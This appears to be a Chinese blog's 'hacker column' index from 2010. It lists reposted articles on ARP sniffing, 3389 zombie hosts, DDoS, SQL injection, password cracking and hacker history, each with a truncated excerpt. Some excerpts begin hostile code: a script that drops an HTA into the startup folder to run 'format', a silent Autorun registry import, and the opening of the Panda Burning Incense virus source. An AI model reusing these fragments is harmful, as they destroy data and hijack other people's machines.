
黑客专栏~!
文章平均质量分 68
wtj198714
把自己从一粒沙子变成一颗价值连城的珍珠。。
展开
-
ARP监听渗透内网的方法
假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 第一步: tracert 61.139.1.1 C:/WIN2000/system32>tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hop转载 2010-02-24 19:09:00 · 455 阅读 · 0 评论 -
建立你的3389肉鸡
在当今世界上,电脑信息网络使人们得以在国内各地乃至全球范围内交换各种各样的信息,正所谓“足不出户能知天下事”。在目前全球性电脑信息网络中,最为成功和覆盖面最大、信息资源最丰富的当属 现在有输入法漏洞的机器已不多了,除非你遇见的是一个极不负责任的网管,呵呵!~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器,使它成为你的肉鸡。(下面的人要注意啊,不要搞国内的机器,我用来做示范的是台转载 2010-02-24 19:18:00 · 576 阅读 · 0 评论 -
不是所有的黑客都是罪犯!
黑客有自己的道德准则:所有的信息都应当是免费的;打破电脑集权;计算机使生活更美好等 普通的电脑程序员要成为黑客也不难,但要成为一名黑客高手,除了智慧,还要有足够的耐心和毅力 网络安全最薄弱的环节并不是系统漏洞,而是人的漏洞 电脑黑客是一群处于地下状态的电脑狂人,尽管技术高超,但他们却不能抛头露面,他们的网站一律以黑色为背景,平添几分神秘色彩。想到黑客,人们脑中就闪现出两个字:罪犯。 不过最近,这些转载 2010-02-24 19:16:00 · 619 阅读 · 0 评论 -
恶意代码(黑客)` 仅供学习
1、格式化硬盘[Copy to clipboard]CODE: scr.Reset(); scr.Path="C:/windows/Men?inicio/Programas/Inicio/automat.hta"; scr.Doc="wsh.Run(start /m format a转载 2010-02-24 19:06:00 · 654 阅读 · 0 评论 -
浅析七种DDoS攻击技术
DDOS攻击是现在最常见的一种黑客攻击方式,下面就给大家简单介绍一下DDOS的七种攻击方式。 1.Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。 2.Smurf:该攻击向一个子网的广播地转载 2010-02-24 19:04:00 · 572 阅读 · 0 评论 -
黑客常用九种攻击方法
许多上网的用户对网络安全可能抱着无所谓的态度,认为最多不过是被“黑客”盗用账号,他们往往会认为“安全”只是针对那些大中型企事业单位的,而且黑客与自己无怨无仇, 干嘛要攻击自己呢?其实,在一无法纪二无制度的虚拟网络世界中,现实生活中所有的阴险和卑鄙都表现得一览无余,在这样的信息时代里,几乎每个人都面临着安全威胁,都有必要对网络安全有所了解,并能够处理一些安全方面的问题,那些平时不注意安全的人,往往在转载 2010-02-24 19:00:00 · 1743 阅读 · 0 评论 -
SQL注入入侵动网SQL
编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是SA帐号,就更是麻烦了。 正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多理想状态下的入侵行转载 2010-02-24 19:24:00 · 556 阅读 · 0 评论 -
用自解压包入侵
用自解压包删光别人的硬盘,相信大家都会。我给大家介绍个用自解压包入侵的方法。 如果捆绑一个木马给别人,只要稍有常识的人有杀毒软件就可以识破。如果不用木马, 用些批处理炸弹、碎片对象文件、或自导入注册表文件,就可以实现各种攻击。 把以下两行保存为Autorun.inf [Autorun] open=regedit /s Autorun.reg 把以下一段保存为Autorun.reg REGEDIT4转载 2010-02-24 19:22:00 · 524 阅读 · 0 评论 -
简单突破QQ好友拒加
我们有遇到这样的情况。就是有MM号Q号。但她好友上设置为拒加。加不了就不能聊天。为此而苦恼。现在教大家一种简单的方法。轻易绕过骗验和MM聊天 以QQ:10000来试范 下面看****作。 先加一下10000。状态是拒加的。 在生成在线状态的网页上,填上你需要和她的聊的QQ号码~ 然后复制代码。 在桌面新建一个空文档,把代码复制进去。 保存后,把后缀名改为htm 这样就可以了。 打开试试 这样就开了转载 2010-02-24 19:21:00 · 2284 阅读 · 2 评论 -
常用的DoS命令:IPC$口令
DOS 常用命令: dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录 copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘 edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录转载 2010-02-24 19:20:00 · 842 阅读 · 0 评论 -
熊猫烧香--核心代码1
program japussy; uses windows, sysutils, classes, graphics, shellapi{, registry}; const headersize = 82432; //病毒体的大小 iconoffset = $12eb8; //pe文件主图标的偏移量 //在我的delphi5 sp1上面编译得到的大小,转载 2010-02-24 19:20:00 · 568 阅读 · 0 评论 -
黑客入侵的基础:口令入侵法
要入侵系统首先阻碍我们的将是网络管理员的第一道安全防线——合法的用户名与口令,它决定于你在该网站的权限,所以口令入侵法可以说是黑客的基础,对于一个刚开始学习HACK的网友这篇文章可能会让你大有所进。 当我们要试着解密之前我们得先来了解一下加密的过程,兼于加密方法的种类之多,我们就讲一下标准的UNIX加密技术,但关于DES加密技术的材料很少这主要是IBM应美国国家安全局的要求把某些文档定为了国家转载 2010-02-24 19:17:00 · 931 阅读 · 0 评论 -
早期的黑客
hacker时代的滥觞始於1961 年mit出现第一台电脑dec pdp-1。mit的tech model railroad club(简称tmrc)的power and signals group买了这台机器後,把它当成最时髦的科技玩具,各种程式工具与电脑术语开始出现,整个环境与文化一直发展下去至今日。 这在steven levy的书`hackers 前段有详细的记载(anchor/doubl转载 2010-02-24 19:15:00 · 617 阅读 · 0 评论 -
DDoS攻击原理及防范(一)
分布式拒绝服务攻击(DDoS)是目前黑客经常采用而难以防范的攻击手段。本文从概念开始详细介绍了这种攻击方式,着重描述了黑客是如何组织并发起的DDoS攻击,结合其中的Syn Flood实例,您可以对DDoS攻击有一个更形象的了解。最后作者结合自己的经验与国内网络安全的现况探讨了一些防御DDoS的实际手段。 DDoS攻击概念 DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服转载 2010-02-24 19:23:00 · 633 阅读 · 0 评论